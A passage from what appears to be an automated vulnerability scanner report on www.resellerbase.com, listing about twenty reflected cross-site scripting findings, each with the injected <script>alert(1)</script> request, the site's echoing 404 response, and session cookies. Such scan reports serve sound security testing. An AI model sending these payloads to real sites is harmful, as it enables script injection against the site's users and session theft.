Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos/images/rating/0.gif80e58<script>alert(1)</script>c5d29fdfe41 was not found on this server.</p>
...[SNIP]...

2.2339. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2b04<script>alert(1)</script>1288b446b8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos/images/rating/0.gif?b2b04<script>alert(1)</script>1288b446b8f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos/images/rating/0.gif?b2b04<script>alert(1)</script>1288b446b8f=1 was not found on this server.</p>
...[SNIP]...

2.2340. http://www.resellerbase.com/detail/34/vod-cash-com-german.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/vod-cash-com-german.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 533b8<script>alert(1)</script>d5acf314f5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail533b8<script>alert(1)</script>d5acf314f5d/34/vod-cash-com-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail533b8<script>alert(1)</script>d5acf314f5d/34/vod-cash-com-german.html was not found on this server.</p>
...[SNIP]...

2.2341. http://www.resellerbase.com/detail/34/vod-cash-com-german.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/34/vod-cash-com-german.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57208<a>c02319a56df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/3457208<a>c02319a56df/vod-cash-com-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3457208<a>c02319a56df/vod-cash-com-german.html was not found on this server.</p>
...[SNIP]...

2.2342. http://www.resellerbase.com/detail/34/vod-cash-com-german.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/vod-cash-com-german.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 301b8<script>alert(1)</script>7548ec7ca75 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/301b8<script>alert(1)</script>7548ec7ca75 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/301b8<script>alert(1)</script>7548ec7ca75 was not found on this server.</p>
...[SNIP]...

2.2343. http://www.resellerbase.com/detail/35/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e3170<script>alert(1)</script>5138f7e3fe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile3170<script>alert(1)</script>5138f7e3fe0/35/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile3170<script>alert(1)</script>5138f7e3fe0/35/ was not found on this server.</p>
...[SNIP]...

2.2344. http://www.resellerbase.com/detail/35/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fbb85<script>alert(1)</script>8f42548ecf9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35fbb85<script>alert(1)</script>8f42548ecf9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35fbb85<script>alert(1)</script>8f42548ecf9/ was not found on this server.</p>
...[SNIP]...

2.2345. http://www.resellerbase.com/detail/35/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 21458<script>alert(1)</script>bbce6fa5561 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/?21458<script>alert(1)</script>bbce6fa5561=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/?21458<script>alert(1)</script>bbce6fa5561=1 was not found on this server.</p>
...[SNIP]...

2.2346. http://www.resellerbase.com/detail/35/awempire-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/awempire-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93b86<script>alert(1)</script>ee17908cb97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail93b86<script>alert(1)</script>ee17908cb97/35/awempire-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail93b86<script>alert(1)</script>ee17908cb97/35/awempire-com.html was not found on this server.</p>
...[SNIP]...

2.2347. http://www.resellerbase.com/detail/35/awempire-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/awempire-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8da9e<a>6b554553757 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/358da9e<a>6b554553757/awempire-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/358da9e<a>6b554553757/awempire-com.html was not found on this server.</p>
...[SNIP]...

2.2348. http://www.resellerbase.com/detail/35/awempire-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/awempire-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cfe79<script>alert(1)</script>28083edb9c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/cfe79<script>alert(1)</script>28083edb9c1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/cfe79<script>alert(1)</script>28083edb9c1 was not found on this server.</p>
...[SNIP]...

2.2349. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc1b8<script>alert(1)</script>a0032ab6162 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfc1b8<script>alert(1)</script>a0032ab6162/35/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfc1b8<script>alert(1)</script>a0032ab6162/35/rating.php was not found on this server.</p>
...[SNIP]...

2.2350. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7282e<script>alert(1)</script>e57bd8ccd71f1eeaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail7282e<script>alert(1)</script>e57bd8ccd71f1eeaf/35/rating.php?id=35&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7282e<script>alert(1)</script>e57bd8ccd71f1eeaf/35/rating.php?id=35&rating=5 was not found on this server.</p>
...[SNIP]...

2.2351. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ed90<script>alert(1)</script>c0d368eca884005e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/354ed90<script>alert(1)</script>c0d368eca884005e2/rating.php?id=35&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/354ed90<script>alert(1)</script>c0d368eca884005e2/rating.php?id=35&rating=5 was not found on this server.</p>
...[SNIP]...

2.2352. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2a96<script>alert(1)</script>601ea4ee280 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35e2a96<script>alert(1)</script>601ea4ee280/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35e2a96<script>alert(1)</script>601ea4ee280/rating.php was not found on this server.</p>
...[SNIP]...

2.2353. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d1c5d<script>alert(1)</script>b825bd0dc2e778375 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/35/rating.phpd1c5d<script>alert(1)</script>b825bd0dc2e778375?id=35&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/rating.phpd1c5d<script>alert(1)</script>b825bd0dc2e778375?id=35&rating=5 was not found on this server.</p>
...[SNIP]...

2.2354. http://www.resellerbase.com/detail/35/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload afcff<script>alert(1)</script>843aac5b5ef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/rating.phpafcff<script>alert(1)</script>843aac5b5ef HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/rating.phpafcff<script>alert(1)</script>843aac5b5ef was not found on this server.</p>
...[SNIP]...

2.2355. http://www.resellerbase.com/detail/35/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0a48<script>alert(1)</script>b78a42aadb59ac196 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/35/rating.php/c0a48<script>alert(1)</script>b78a42aadb59ac196?id=35&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/rating.php/c0a48<script>alert(1)</script>b78a42aadb59ac196?id=35&rating=5 was not found on this server.</p>
...[SNIP]...

2.2356. http://www.resellerbase.com/detail/35/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a8830<script>alert(1)</script>9741e0d1b8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/rating.php?a8830<script>alert(1)</script>9741e0d1b8d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/rating.php?a8830<script>alert(1)</script>9741e0d1b8d=1 was not found on this server.</p>
...[SNIP]...

2.2357. http://www.resellerbase.com/detail/35/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9afb7<script>alert(1)</script>46d0b782ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9afb7<script>alert(1)</script>46d0b782ee/35/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
